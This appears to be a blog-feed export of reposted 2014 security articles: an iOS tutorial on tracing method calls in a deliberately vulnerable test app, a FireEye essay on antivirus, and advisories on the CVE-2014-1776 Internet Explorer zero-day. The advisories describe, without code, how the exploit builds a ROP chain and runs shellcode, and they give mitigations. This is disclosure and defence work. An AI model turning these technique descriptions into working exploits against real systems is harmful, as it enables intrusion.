Now let’s create a tweak and replace its Tweak.xm file with our own. Also, give the filter as the bundle identifier for DVIA, as we only want to trace calls for DVIA. Have a look at the <a href="http://highaltitudehacks.com/2014/04/18/ios-application-security-part-33-writing-tweaks-using-theos-cydia-substrate" style="color: rgb(51, 51, 51) !important; text-decoration: none;"><span style="text-decoration: underline;">previous</span></a> article if you are new to writing tweaks.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat4.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat4.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Build the package.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat5.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat5.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Now install it on your device and respring your device.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat6.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat6.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Now check the folder <em>/Library/MobileSubstrate/DynamicLibraries</em> on your device to see whether the tweak was installed, and sure enough, we can see that it has been installed.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat7.png" src="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat7.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Now run the DVIA app. Make sure your device is connected to your computer and go to Xcode —> Window —> Organizer —> Devices & select your device and click on Console. You will see the DVIAMethodTracer tweak being loaded into your application.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat8.png" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/plugins/jquery-image-lazy-loading/images/grey.gif" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
And now as you browse around in the application and invoke methods for the particular classes that we have set up Logify for, you will see that these methods are logged along with the value of their arguments.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/043014_1340_iOSApplicat9.png" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/plugins/jquery-image-lazy-loading/images/grey.gif" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Logify can be a very useful tool in figuring out the order in which methods are called and hence deducing a lot about the flow of the application.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<a href="http://resources.infosecinstitute.com/ios-application-security-part-34-tracing-method-calls-using-logify/" target="_blank">http://resources.infosecinstitute.com/ios-application-security-part-34-tracing-method-calls-using-logify/</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-46653924805895318882014-05-05T18:14:00.002-07:002014-05-05T18:14:17.663-07:00[fireeye] Ghost-Hunting With Anti-Virus<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
In October 2012, data security firm Imperva released a controversial report on the efficacy of anti-virus (AV), which concluded that AV solutions only stopped 5 percent of all malware identified. Few reports in the security industry had been as polarizing as this one—many reacting with white-knuckle rage. It was a classic case of Chris Christensen’s “Innovator’s Dilemma,” where old school technologies cling to life, in the face of a new paradigm. Just yesterday, one of the original anti-virus vendors joined the fray in “<a href="http://online.wsj.com/news/articles/SB10001424052702303417104579542140235850578" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">declaring anti-virus dead</a>” in the Wall Street Journal.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
At FireEye, we look at hundreds of malware samples daily, and, in a recent talk at RSA Conference, Zheng Bu, vice president of research at FireEye presented some interesting data that security teams should consider as they think about their AV initiatives. Looking at nearly half a million malware samples over two years, our researchers discovered that the average lifespan of a piece of malware is very short. The chart below compares how many hours (X axis) malware lives against the total pool of malware samples (Y axis) to show just how quickly they disappear:</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/05/av1.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="av1" height="296" src="http://www.fireeye.com/blog/wp-content/uploads/2014/05/av1.png" style="border: 0px; max-width: 98%;" width="540" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Our data shows an interesting picture: most malware remains active for no more than two hours when FireEye is detecting it. To be precise, our analysis showed that in 2013:</div>
<ul style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 16.003000259399414px; margin: 0px; padding: 0px;">
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">82 percent of malware disappears after one hour</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">70 percent of malware only exists once</li>
</ul>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
With the half-life of malware being so short, we can draw the conclusion that the function signature-based AV serves has become more akin to ghost hunting than threat detection and prevention. In spite of this, IDC found the market for endpoint security products like anti-virus to generate $11 billion in revenues in its <a href="http://idcdocserv.com/242465e_Qualys" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">“Worldwide IT Security Products 2013 – 2017 Forecast”</a> despite APT activities creating nearly fifty unique malware infections everyday.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<b><span style="text-decoration: underline;">In AV Land, Everyone Is a Sacrificial Lamb</span></b></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Today’s AV model makes everyone a sacrificial lamb. In the past, malware writers would write their attack code once with little need to iterate. Today, as our numbers show, rapidly developing iterations of malware is becoming the de facto way of hacking.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
A simple comparison of the malware writing process versus anti-virus signature development shows a stark contrast.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
First, let’s look at the malware development process:</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/05/av2.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="av2" class="aligncenter wp-image-5423" height="198" src="http://www.fireeye.com/blog/wp-content/uploads/2014/05/av2.png" style="border: 0px; max-width: 98%;" width="540" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Malware is developed, QA’d against the latest AV signatures, released, and once it is picked up by AV sensors and shared among vendors—the malware dies. The process takes a few days at most.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
By contrast, anti-virus vendors work in a process that takes a few days to a few weeks.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/05/av3.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="av3" class="aligncenter wp-image-5422" height="198" src="http://www.fireeye.com/blog/wp-content/uploads/2014/05/av3.png" style="border: 0px; max-width: 98%;" width="540" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Examining the two “supply chains,” you quickly see why anti-virus is inherently behind the curve – doomed to chasing ghosts. By the time malware signatures are updated from collection and have gone through QA, the samples are more-or-less defunct unless it is a rare instance where the core code of the malware could not be modified. Over the years AV vendors have increased the frequency of signature updates to convey the benefits of eventual detection. However, it is already an increasing challenge to apply frequent security updates to thousands of business-critical computer assets in medium to large size organizations – especially where many assets such as laptops are also mobile. Ultimately this does not close the days to weeks collecting new malware samples can take, which is why security solutions – like FireEye – that do not rely on such a reactive model detect malware faster.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
To be clear, single-iteration malware will continue to persist, and a minor need for AV will remain to provide a layer of reactive protection against these unsophisticated, benign threats. But with high-profile breaches occurring frequently, being driven by fast-moving, advanced threats, it is clear that next generation technologies and approaches are needed. Even Gartner has noted the senescence of anti-virus in two very recent reports. Notably, in the Magic Quadrant for Endpoint Protection Platforms (i.e., anti-virus), where its opening sentences of the “Market Overview” state:</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<i>The rise of the targeted attack is shredding what is left of the [endpoint] anti-malware market’s stubborn commitment to reactive protection techniques. Improving the malware signature distribution system, or adapting behavior detection [in endpoint solutions] to account for the latest attack styles, will not improve the effectiveness rates against targeted attacks. (From 8 January 2014).</i></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
So, what should we do as an industry knowing that the AV is ineffective today based on these findings? We recommend:</div>
<ul style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 16.003000259399414px; margin: 0px; padding: 0px;">
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Accepting that the signature-based AV model cannot play a key part of enterprises’ threat-prevention models. Start shifting security strategies to modern methods that identify malware at the time of attack rather than after it has died.</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Reconfigure compliance mandates to place much less emphasis on AV and other reactive, signature-based approaches. Once regulators and compliance mandates make it easier to adopt innovation, we’ll finally make life a little harder for the attackers.</li>
</ul>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
In doing this, we will be able to protect ourselves not from the ghosts that we imagine are haunting our homes, but from the burglars and malware that truly steal our possessions and erode our foundations.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<a href="http://www.fireeye.com/blog/corporate/2014/05/ghost-hunting-with-anti-virus.html" target="_blank">http://www.fireeye.com/blog/corporate/2014/05/ghost-hunting-with-anti-virus.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-5083232718920427092014-05-05T18:06:00.003-07:002014-05-05T18:06:48.908-07:00[fireeye] Mobile Phones: Smart Doesn’t Equal Safe<a href="http://www2.fireeye.com/bring-your-own-difficulties.html" style="background-color: white; color: #4298b5; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; font-weight: bold; line-height: 18.200000762939453px; text-align: center; text-decoration: none;" target="_blank"><img alt="Mobile Phones: Smart Doesn't Equal Safe" class="aligncenter wp-image-5411" height="1600" src="http://www.fireeye.com/blog/wp-content/uploads/2014/05/mobile_infographic.png" style="border: 0px; max-width: 98%;" width="600" /></a><br />
<a href="http://www.fireeye.com/blog/corporate/2014/05/mobile-phones-smart-doesnt-equal-safe.html" target="_blank">http://www.fireeye.com/blog/corporate/2014/05/mobile-phones-smart-doesnt-equal-safe.html</a>Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-72096743802639167392014-05-05T18:05:00.002-07:002014-05-05T18:05:42.037-07:00[fireeye] “Operation Clandestine Fox” Now Attacking Windows XP Using Recently Discovered IE Vulnerability<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
On April 26th, FireEye Research Labs notified the public of a <a href="http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html" style="color: #4298b5; font-weight: bold; text-decoration: none;">new IE zero-day exploit being used in “Operation Clandestine Fox.”</a> The initial attack targeted users of IE versions 9, 10, and 11 on Windows 7 and 8. Despite attackers only targeting those versions of Microsoft IE and Windows OS, <b>the vulnerability actually impacts all versions of IE from 6 through 11.</b></div>
<a name='more'></a><br />
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Today, FireEye Labs can reveal a newly uncovered version of the attack that specifically targets out-of-life <b>Windows XP machines running IE 8</b>. <b>This means that live attacks exploiting </b><a href="https://technet.microsoft.com/en-US/library/security/2963983" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">CVE-2014-1776</a><b> are now occurring against users of IE 8 through 11 and Windows XP, 7 and 8</b>.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
We have also observed that multiple, new threat actors are now using the exploit in attacks and have expanded the industries they are targeting. In addition to previously observed attacks against the Defense and Financial sectors, organization in the Government- and Energy-sector are now also facing attack.</div>
<h2 style="background-color: white; color: #c8102e; font-family: arial, helvetica, clean, sans-serif; font-size: 18px; font-weight: normal; margin: 0px 0px 10px; padding: 0px 0px 4px;">
Mitigation</h2>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
In our tests, disabling VXG.dll blocks this attack on all configurations of IE and Windows OSs. However, we strongly suggest that Windows XP users upgrade to a later Windows operating system to take advantage of new mitigation technologies from Microsoft, such as EMET 5.0 and IE with Enhanced Protected Mode (EPM). Deploying preventative measures now will help mitigate the impact of these exploits until Microsoft patches the underlying vulnerability, and will offer additional protection from future ZeroDay exploits.</div>
<h2 style="background-color: white; color: #c8102e; font-family: arial, helvetica, clean, sans-serif; font-size: 18px; font-weight: normal; margin: 0px 0px 10px; padding: 0px 0px 4px;">
Details</h2>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The main differences between this new attack targeting Windows XP compared to the original Windows 7/8.1 versions of this attack are the mitigation bypasses. The Windows 7/8.1 version develops its write primitive into read/write access to much of the process space by corrupting Flash vector objects. This is to bypass ASLR by searching for ROP gadgets and building a ROP chain dynamically in memory.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Without ASLR, ROP gadgets can be constructed beforehand with static addresses. Consequently, Flash assistance in the Windows XP version is much simpler. It builds a ROP chain with static addresses to gadgets in MSVCRT, tweaks addresses for a plethora of language packs, and jumps directly to a pivot without developing a write primitive. From there, the ROP chain calls VirtualAlloc to allocate executable memory, copies the shellcode to the allocated chunk, and executes the shellcode.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
This new tactic of specifically targeting those running Windows XP means the risk factors of this vulnerability are now even higher. We have been working with Microsoft and they have released an <a href="https://technet.microsoft.com/en-us/library/security/ms14-may.aspx" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">Out of Band patch</a>. FireEye highly recommends users of Microsoft Internet Explorer apply the patch as soon as possible for security reasons.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<a href="http://www.fireeye.com/blog/technical/targeted-attack/2014/05/operation-clandestine-fox-now-attacking-windows-xp-using-recently-discovered-ie-vulnerability.html" target="_blank">http://www.fireeye.com/blog/technical/targeted-attack/2014/05/operation-clandestine-fox-now-attacking-windows-xp-using-recently-discovered-ie-vulnerability.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-37707629220790669952014-04-28T21:42:00.003-07:002014-04-28T21:42:55.205-07:00[securityaffairs] FireEye discovered a new zero-day exploit for IE in the wild – Operation Clandestine Fox<h2 style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
<span class="GINGER_SOFTWARE_mark" id="da9b409f-fe4c-4a59-b671-9e4ad5348745">FireEye</span> Research Labs has identified a new IE zero-day vulnerability exploited in a series of targeted attacks part of the Operation Clandestine Fox.<a name='more'></a></h2>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<span class="GINGER_SOFTWARE_mark" id="67fc0363-f966-4e18-8dc2-0201a6125ccd">FireEye</span> Research Labs has identified a <a href="http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html">new Internet Explorer (IE) zero-day</a>vulnerability exploited in a series of <a href="http://securityaffairs.co/wordpress/18294/security/fireeye-nation-state-driven-cyber-attacks.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="FireEye World War C report – Nation-state driven cyber attacks">targeted attacks</a>. The <a href="http://securityaffairs.co/wordpress/20275/cyber-crime/nss-labs-zero-day-exploits.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Zero-day vulnerability exploits, too precious commodities">zero-day</a> flaw affects a wide range of versions of the popular browser, from IE6 to IE11, but experts at FireEye, observed the attack is targeting IE9 through IE11.</div>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The impact of the zero-day exploit is significant because affected versions represent about a quarter of the total browser market according to <a href="http://www.netmarketshare.com/browser-market-share.aspx?qprid=2&qpcustomd=0&qpsp=168&qpnp=12&qptimeframe=M" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">NetMarket Share</a>:</div>
<ul style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; list-style: none; margin: 0px 0px 10px 10px; padding: 0px;">
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;">IE 9 13.9%</li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;">IE 10 11.04%</li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;">IE 11 1.32%</li>
</ul>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Also in this case the flaw is a remote code execution vulnerability, it allows <span class="GINGER_SOFTWARE_mark" id="cedaa75f-7912-4213-b3af-e4c3a09fddf3">attackers</span>to <span class="GINGER_SOFTWARE_mark" id="1776a3f4-ed8c-4d96-9747-1ed3879715da">bypass</span> both ASLR and DEP, Microsoft has assigned to the flaw the code <a href="https://technet.microsoft.com/en-US/library/security/2963983" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="https://technet.microsoft.com/en-US/library/security/2963983">CVE-2014-1776</a> and issued a specific security advisory.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="color: #5b6770; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“Microsoft is aware of limited, targeted attacks that attempt to exploit a vulnerability in Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, and Internet Explorer 11.</em></div>
<div style="color: #2a2a2a; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>The vulnerability is a remote code execution vulnerability. The vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated. The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer. An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website.”</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The experts have identified an ongoing campaign named “Operation Clandestine Fox”, but haven’t provided further details on it to avoid interfering with the investigation.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="color: #5b6770; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“The <span class="GINGER_SOFTWARE_mark" id="7d4c37e3-07fb-4b8f-8283-dbadb93815a1"><span class="GINGER_SOFTWARE_mark" id="c3d11cf8-ac2c-4aa5-8175-b1f39e0ced37">exploit</span></span> leverages a previously unknown use-after-free vulnerability, and uses a well-known <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/10/aslr-bypass-apocalypse-in-lately-zero-day-exploits.html" style="color: #4298b5; font-weight: bold; text-decoration: none;">Flash exploitation technique</a> to achieve arbitrary memory access and bypass Windows’ ASLR and DEP protections.” reports the official post from FireEye.</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
While Microsoft confirmed that Enhanced Mitigation Experience Toolkit (EMET) could mitigate the threat, breaking the exploit in <span class="GINGER_SOFTWARE_mark" id="47ac0c18-b3eb-478a-9d5e-dce08cdfe837">user’s environment</span>, FireEye confirmed the attack will not work without the presence of Adobe Flash, this means that disabling the Flash plugin within IE will prevent the exploit from functioning<strong>.</strong></div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="color: #5b6770; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“Does EMET help mitigate attacks that try to exploit this vulnerability?<span style="color: #2a2a2a;"> </span></em><br style="color: #2a2a2a;" /><em><span style="color: #2a2a2a;">Yes. The Enhanced Mitigation Experience Toolkit (EMET) enables users to manage security mitigation technologies that help make it more difficult for attackers to exploit vulnerabilities in a given piece of software. EMET helps to mitigate this vulnerability in Internet Explorer on systems where EMET is installed and configured to work with Internet Explorer.” reports the advisory issued by Microsoft.</span></em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The experts at FireEye reported another intriguing detail on the investigation, the <a href="http://securityaffairs.co/wordpress/22056/cyber-crime/apt-cost-dramatically-dropping.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Cost of conducting APT campaigns is dramatically dropping">APT group</a> responsible for this zero-day exploit “<em>has been the first group to have access to a select number of browser-based 0-day exploits</em>” in the past.</div>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The group appears particularly active and adopted all necessary countermeasures to avoid to be tracked, the bad actors <span class="GINGER_SOFTWARE_mark" id="9f1d2f55-4951-4673-8002-db54f9a497e6">have</span> different <span class="GINGER_SOFTWARE_mark" id="a9c76b30-923c-437b-afaf-53729e31291d">backdoors</span> in their arsenal and never reused the same command and control infrastructures.</div>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<span class="GINGER_SOFTWARE_mark" id="ece40356-9570-4f6a-8673-e9258b74c7ad">FireEye</span> investigations allowed <span class="GINGER_SOFTWARE_mark" id="e9b2f7f4-bbed-4259-94e7-a04890fe1548">to</span> the <span class="GINGER_SOFTWARE_mark" id="b18eeeeb-2e70-4d6b-a38b-5cd1f753630a">security industry</span> to discover <span style="color: #444444;">eleven <a href="http://securityaffairs.co/wordpress/22818/cyber-crime/2013-advanced-threat-report.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="FireEye 2013 Advanced Threat Report on APTs campaigns">zero-day vulnerabilities</a> during 2013, the company </span>analyzed almost 40,000 unique, advanced attacks, over 100 per day.</div>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<img alt="FireEye zero-day 2013" class="aligncenter" height="316" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/03/FireEye-2013-Advanced-Threat-Report-Final-3.jpg" style="display: block; margin-left: auto; margin-right: auto;" title="FireEye discovered a new zero day exploit for IE in the wild Operation Clandestine Fox" width="390" /></div>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
